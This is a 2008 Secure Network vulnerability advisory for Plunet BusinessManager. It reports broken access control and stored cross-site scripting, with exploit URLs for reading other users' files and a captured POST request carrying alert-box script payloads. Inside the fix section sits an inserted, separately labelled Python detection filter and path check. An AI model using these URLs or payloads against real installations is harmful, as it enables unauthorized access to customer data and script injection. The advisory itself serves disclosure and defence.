Secure Network - Security Research Advisory

Vuln name: Failure in Access Controls; multiple Stored Cross Site Scripting vulnerabilities.
Systems affected: Plunet BusinessManager
Systems not affected:
Severity: High
Local/Remote: Remote
Vendor URL: http://www.plunet.de
Author(s): Matteo Ignaccolo m.ignaccolo@securenetwork.it - Gabriele Zanoni g.zanoni@securenetwork.it
Relates to:
Vendor disclosure: 23/09/2008
Vendor acknowledged:
Vendor patch release:
Public disclosure: 23/12/2008
Advisory number: SN-2008-04
Advisory URL: http://www.securenetwork.it/advisories/

*** SUMMARY ***

Plunet BusinessManager is a powerful software for translation companies that offers, on a single platform, a solution to handle customers, translators, document management, data, order management and processing.

Since Plunet BusinessManager performs incorrect validation of some input forms, Stored Cross Site Scripting attacks are possible. Moreover, customers and translators can access data and files not related to them.

*** VULNERABILITY DETAILS ***

The application fails to perform correct access control on data and files. Any user (Customers and Translators) could retrieve and alter data and files not related to him. Also, a user could easily enumerate all Company customers.

The application fails to validate the QUB and Bez74 parameters, so stored Cross Site Scripting attacks are possible.

*** EXPLOIT ***

An authenticated Customer could use the following URL to access other Customers' private area.
http://domain/pagesUTF8/Sys_DirAnzeige.jsp?AnzeigeText=&Pfad=/Customer/

An authenticated Translator could use the following URL to access Orders not related to him

http://domain/pagesUTF8/Sys_DirAnzeige.jsp?AnzeigeText=/PRM&Pfad=/ORDER/C-00042/PRM

An authenticated Translator could use the following URL to access Jobs not related to him

http://domain/pagesUTF8/auftrag_job.jsp?OSG05=1944&anchor=AJob31944

surf jobs

Stored Cross Site Scripting

POST /pagesUTF8/auftrag_allgemeinauftrag.jsp HTTP/1.1
Host: or IP
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080718 Ubuntu/8.04 (hardy) Firefox/2.0.0.16
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http:///pagesUTF8/auftrag_allgemeinauftrag.jsp
Cookie: JSESSIONID=0B1347DFFD031E6BC1944C381A31293D
Content-Type: application/x-www-form-urlencoded
Content-Length: 1085

TokenUAID=42&QUK=1449&QUKA=*&QUKANSCH=820&QUKLIEFANSCH=820&QUZ=sample&
VorlageID=3&QU02=1-&QUL=sample&QUB=%22%3E%3Cscript%3Ealert%28%22XSS2%22%29
%3B%3C%2Fscript%3E&QUG=sample&OSPK01=141&OSPK02=0&OSSK05=&OSSK09=1&PJ12=14
&DATAUFTT=07&DATAUFMM=01&DATAUFJJJJ=2008&DATLIEFTT=24&DATLIEFMM=01&
DATLIEFJJJJ=2008&DATLIEFHH=&DATLIEFMN=&PJ13=&
Bez74=%22%3E%3Cscript%3Ealert%28%22XSS4%22%29%3B%3C%2Fscript%3E&
LDate74TT=24&LDate74MM=01&LDate74JJJJ=2008&LDate74HH=13&
LDate74MN=00&BOXP74=4&REA01774=59&REA01874=sample&
OutPE0174=0&OutPAP74=8385&Bem74=sample&REA001=&REA010=&REA007=1&REA008=2&
REA011=0&REA013=0&REA015=0&LEISTung=sample&LangFlag=&exit=&SelectTab=
&ContentBox=&OpenContentBox=&LoginPressed=false&SaveButton=true&
CheckXYZ=Send&yOffsetScroll=0

*** FIX INFORMATION ***

No patch is currently available.
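The following is an added example, not code from Secure Network or from Plunet. It shows the two defender-side checks this advisory implies: a filter that URL-decodes a form body and flags markup in the QUB and Bez74 parameters (the kind of rule an application firewall or IPS in front of the JSP application could apply, with HTML-entity encoding as the output-side mitigation), and a server-side authorization check for the Pfad directory parameter that confines a principal to its own directory. The parameter names QUB, Bez74 and Pfad come from the advisory; the trimmed request body is taken from the captured POST above; the per-principal directory layout, the function names and the regular expression are assumptions made for illustration.

```python
"""Added example (not Secure Network's or Plunet's code): defender-side
checks for the two issues in advisory SN-2008-04.

Assumptions (not from the advisory): the filter sees the decoded request
together with the directory the authenticated principal owns; each
customer/translator has one directory (constructed layout); the
detection regex is a coarse signal, not a complete XSS grammar.
"""

import html
import posixpath
import re
from urllib.parse import parse_qs, unquote

# Parameters the advisory names as stored-XSS sinks.
XSS_PARAMS = ("QUB", "Bez74")

# Coarse signal for script injection after URL decoding (assumption).
SCRIPT_RE = re.compile(
    r"<\s*/?\s*(script|iframe|img|svg)\b|javascript:|\bon\w+\s*=", re.I
)

# Trimmed copy of the request body captured in the advisory.
SAMPLE_BODY = (
    "TokenUAID=42&QUK=1449&QUB=%22%3E%3Cscript%3Ealert%28%22XSS2%22%29"
    "%3B%3C%2Fscript%3E&QUG=sample&"
    "Bez74=%22%3E%3Cscript%3Ealert%28%22XSS4%22%29%3B%3C%2Fscript%3E&"
    "Bem74=sample"
)


def parse_form_body(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body or query string."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def find_xss_params(form: dict) -> list:
    """Names of the monitored parameters whose decoded value carries markup."""
    return [p for p in XSS_PARAMS if p in form and SCRIPT_RE.search(form[p])]


def encode_for_html(value: str) -> str:
    """Output-side mitigation: entity-encode stored data before rendering."""
    return html.escape(value, quote=True)


def is_path_authorized(requested: str, allowed_root: str) -> bool:
    """Confine a Pfad value to the directory owned by the principal.

    The path is decoded and normalized first, so '..' segments cannot
    climb out of the allowed root (constructed per-principal layout).
    """
    full = posixpath.normpath("/" + unquote(requested).lstrip("/"))
    root = posixpath.normpath("/" + allowed_root.strip("/"))
    return full == root or full.startswith(root + "/")


def inspect_request(body: str, principal_root: str) -> dict:
    """Run both checks over one request; findings a WAF/IPS could log or block on."""
    form = parse_form_body(body)
    findings = {"xss_params": find_xss_params(form), "path_denied": False}
    if "Pfad" in form and not is_path_authorized(form["Pfad"], principal_root):
        findings["path_denied"] = True
    return findings


if __name__ == "__main__":
    # The captured POST: both sink parameters carry a script tag.
    print(inspect_request(SAMPLE_BODY, "/Customer/C-00042"))
    # The directory-listing URL from the advisory, requested by a customer
    # who only owns /Customer/C-00042 (constructed identity).
    print(inspect_request("AnzeigeText=&Pfad=/Customer/", "/Customer/C-00042"))
    print(encode_for_html(parse_form_body(SAMPLE_BODY)["QUB"]))
```

The authorization check belongs in the application itself (the WAF rule only narrows the window until a patch exists), and it must be applied to every entry point that takes Pfad, not only to Sys_DirAnzeige.jsp.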
*** WORKAROUNDS ***

No workaround is available, but some application firewalls and IPS can be reconfigured to thwart the attack.

*********************
*** LEGAL NOTICES ***
*********************

Secure Network (www.securenetwork.it) is an information security company, which provides consulting and training services, and engages in security research and development.

We are committed to open, full disclosure of vulnerabilities, cooperating whenever possible with software developers for properly handling disclosure.

This advisory is copyright 2008 Secure Network S.r.l. Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. It may not be edited in any way without the express consent of Secure Network S.r.l. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to Secure Network.

The information in the advisory is believed to be accurate at the time of publishing based on currently available information. This information is provided as-is, as a free service to the community by Secure Network research staff. There are no warranties with regard to this information. Secure Network does not accept any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

If you have any comments or inquiries, or any issue with what is reported in this advisory, please inform us as soon as possible.

E-mail: securenetwork@securenetwork.it
GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc
Phone: +39 02 24 12 67 88

--
Dott. Ing. Matteo Ignaccolo
Secure Network S.r.l.
Via Venezia, 23 - 20099 Sesto San Giovanni (MI) - Italia
Tel: +39 02.24126788
email: m.ignaccolo@securenetwork.it
web: www.securenetwork.it